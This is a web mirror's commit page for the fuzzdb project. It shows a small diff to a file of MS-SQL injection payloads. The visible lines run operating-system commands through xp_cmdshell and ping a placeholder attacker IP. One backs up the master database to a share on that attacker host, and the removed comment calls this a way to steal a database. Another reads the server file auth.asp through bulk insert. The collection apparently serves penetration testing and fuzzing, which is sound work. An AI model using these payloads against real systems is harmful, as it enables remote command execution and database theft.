Mirrors/fuzzdb
2
0
Fork 0
mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-11-10 13:34:12 +00:00
Code Issues Projects Releases Packages Wiki Activity

small edit to comment

Browse source
This commit is contained in:
unix23 2010-05-13 13:53:52 +00:00
parent bbe358e96a
commit 7818740153
1 changed files with 1 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
attack-payloads/sql-injection/exploit/ms-sql-enumeration.txt
View file

@ -11,5 +11,5 @@ exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' Backup entire database to a file. This attack can be used to steal a database.
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--